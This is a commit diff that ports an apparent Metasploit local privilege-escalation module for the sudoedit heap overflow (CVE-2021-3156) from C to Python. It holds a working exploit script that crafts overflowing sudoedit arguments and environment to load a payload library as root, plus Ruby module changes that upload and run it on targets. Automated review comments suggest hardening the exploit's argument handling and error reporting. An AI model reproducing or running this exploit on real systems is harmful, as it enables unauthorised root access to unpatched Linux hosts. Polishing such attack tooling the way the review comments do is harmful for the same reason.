Port sudoedit exploit to Python
It is assumed that Python is more likely than gcc to be present on the target system, so it is the better dependency.
This commit is contained in:
parent
78295b654b
commit
fcd17ed3b1
|
@ -0,0 +1,26 @@
|
|||
import sys
|
||||
import os
|
||||
from ctypes import cdll, c_char_p, POINTER
|
||||
|
||||
libc = cdll.LoadLibrary("libc.so.6")
|
||||
libc.execve.argtypes = c_char_p,POINTER(c_char_p),POINTER(c_char_p)
|
||||
|
||||
smash_len_a = int(sys.argv[1])
|
||||
smash_len_b = int(sys.argv[2])
|
||||
null_stomp_len = int(sys.argv[3])
|
||||
lc_all_len = int(sys.argv[4])
|
||||
so_overwrite = sys.argv[5]
|
||||
working_dir = sys.argv[6]
|
||||
|
||||
argv = [b'sudoedit', b'-s', b'#' * smash_len_a + b'\\', b'\\', b'#' * smash_len_b + b'\\', None]
|
||||
cmd = b'/usr/bin/sudoedit'
|
||||
env = [b'\\'] * null_stomp_len
|
||||
env.append(so_overwrite.encode('latin-1'))
|
||||
env.append(b'LC_ALL=C.UTF-8@' + (b'C' * lc_all_len))
|
||||
env.append(None)
|
||||
|
||||
cargv = (c_char_p * len(argv))(*argv)
|
||||
cenvp = (c_char_p * len(env))(*env)
|
||||
|
||||
os.chdir(working_dir)
|
||||
libc.execve(cmd, cargv, cenvp)
|
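Review bot: The new script has no header comment, and its six `sys.argv` reads (`smash_len_a` through `working_dir`) raise a bare IndexError on a short invocation instead of a usage message; a module docstring naming the positional arguments in the order the Ruby module passes them (four integer lengths, the overwrite string, then the working directory) plus `if len(sys.argv) != 7: sys.exit('usage: exploit.py LEN_A LEN_B NULL_LEN LC_LEN OVERWRITE WORKDIR')` before the reads would make the contract explicit. The final `libc.execve(cmd, cargv, cenvp)` discards its return value: execve only returns on failure, so the script then exits with status 0 and the module's `cmd_exec` has no way to see that anything went wrong; `if libc.execve(cmd, cargv, cenvp) == -1: sys.exit(1)` (or reporting errno via `ctypes.get_errno()` after loading libc with `CDLL("libc.so.6", use_errno=True)`) would surface it. Since the module tries `python` before `python3`, this file may run under Python 2 on some listed targets, where `so_overwrite.encode('latin-1')` performs an implicit ASCII decode first; that is presumably harmless for an alphanumeric overwrite string, but a one-line comment stating that the script is written to run under both interpreters would record the intent.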
|
@ -9,7 +9,6 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
prepend Msf::Exploit::Remote::AutoCheck
|
||||
include Msf::Post::File
|
||||
include Msf::Post::Unix
|
||||
include Msf::Post::Linux::Compile
|
||||
include Msf::Post::Linux::System
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Exploit::FileDropper
|
||||
|
@ -47,7 +46,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic', {} ],
|
||||
[ 'Ubuntu 20.04 x64 (sudo v1.8.31, libc v2.31)', { lengths: [ 56, 54, 63, 200 ], version_fingerprint: /^Ubuntu 20\.04/ } ],
|
||||
[ 'Ubuntu 20.04 x64 (sudo v1.8.31, libc v2.31)', { lengths: [ 56, 54, 63, 212 ], version_fingerprint: /^Ubuntu 20\.04/ } ],
|
||||
[ 'Ubuntu 19.04 x64 (sudo v1.8.27, libc v2.29)', { lengths: [ 56, 54, 63, 212 ], version_fingerprint: /^Ubuntu 19\.04/ } ],
|
||||
[ 'Ubuntu 18.04 x64 (sudo v1.8.21, libc v2.27)', { lengths: [ 56, 54, 63, 212 ], version_fingerprint: /^Ubuntu 18\.04/ } ],
|
||||
[ 'Debian 10 x64 (sudo v1.8.27, libc v2.28)', { lengths: [ 64, 49, 60, 214 ], version_fingerprint: %r{^Debian GNU/Linux 10$} } ],
|
||||
|
@ -126,6 +125,12 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
selected_target
|
||||
end
|
||||
|
||||
def find_exec_program
|
||||
return 'python' if command_exists?('python')
|
||||
return 'python3' if command_exists?('python3')
|
||||
return false
|
||||
end
|
||||
|
||||
def exploit
|
||||
if target.name == 'Manual'
|
||||
fail_with(Failure::BadConfig, 'The "Lengths" advanced option must be specified for the manual target') if datastore['Lengths'].blank?
|
||||
|
@ -134,19 +139,25 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
lengths = (target.name == 'Automatic' ? get_automatic_target : target)[:lengths].join(' ')
|
||||
end
|
||||
|
||||
fail_with(Failure::NotFound, 'The gcc binary was not found') unless has_gcc?
|
||||
python_binary = find_exec_program
|
||||
|
||||
fail_with(Failure::NotFound, 'The python binary was not found') unless python_binary
|
||||
|
||||
vprint_status("Using '#{python_binary}' to run exploit")
|
||||
|
||||
path = datastore['WritableDir']
|
||||
|
||||
exe_file_name = rand_text_alphanumeric(5..10)
|
||||
overwrite_path = rand_overwrite_path # the part that is overwritten in memory to construct the full path
|
||||
lib_file_path = "libnss_#{overwrite_path} .so.2" # the full path
|
||||
|
||||
upload_and_compile("#{path}/#{exe_file_name}", exploit_data('CVE-2021-3156', 'exploit.c'), '-lutil')
|
||||
register_files_for_cleanup("#{path}/#{exe_file_name}")
|
||||
python_script_name = rand_text_alphanumeric(5..10) + '.py'
|
||||
upload("#{path}/#{python_script_name}", exploit_data('CVE-2021-3156', 'exploit.py'))
|
||||
register_files_for_cleanup("#{path}/#{python_script_name}")
|
||||
mkdir("#{path}/#{lib_file_path.rpartition('/').first}")
|
||||
upload("#{path}/#{lib_file_path}", generate_payload_dll)
|
||||
cmd_exec("'#{path}/#{exe_file_name}' #{lengths} '#{overwrite_path}'")
|
||||
cmd = "#{python_binary} #{path}/#{python_script_name} #{lengths} #{overwrite_path} #{path}"
|
||||
vprint_status("Running #{cmd}")
|
||||
cmd_exec(cmd)
|
||||
end
|
||||
|
||||
def rand_overwrite_path
|
||||
|
|
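Review bot: The new `cmd = "#{python_binary} #{path}/#{python_script_name} #{lengths} #{overwrite_path} #{path}"` line drops the single quotes that the removed `cmd_exec` line placed around the binary path and `overwrite_path`, so a `WritableDir` containing a space or shell metacharacter now splits the command; `cmd = "#{python_binary} '#{path}/#{python_script_name}' #{lengths} '#{overwrite_path}' '#{path}'"` restores the quoting. `find_exec_program` returns `false` for "not found" where Ruby convention (and the `unless python_binary` check) expects `nil`, and it prefers `python` over `python3`, which on some of the listed targets may resolve to Python 2 — a short comment on the method stating that the uploaded script is expected to work under either interpreter would document that choice. In the targets hunk the fourth length of the 'Ubuntu 20.04 x64 (sudo v1.8.31, libc v2.31)' entry differs between the two printed lines (200 and 212), a change the commit message, which describes only the Python port, does not mention; a sentence in the description would help the next reader. The `exploit` method begins in the preceding hunk, outside this one.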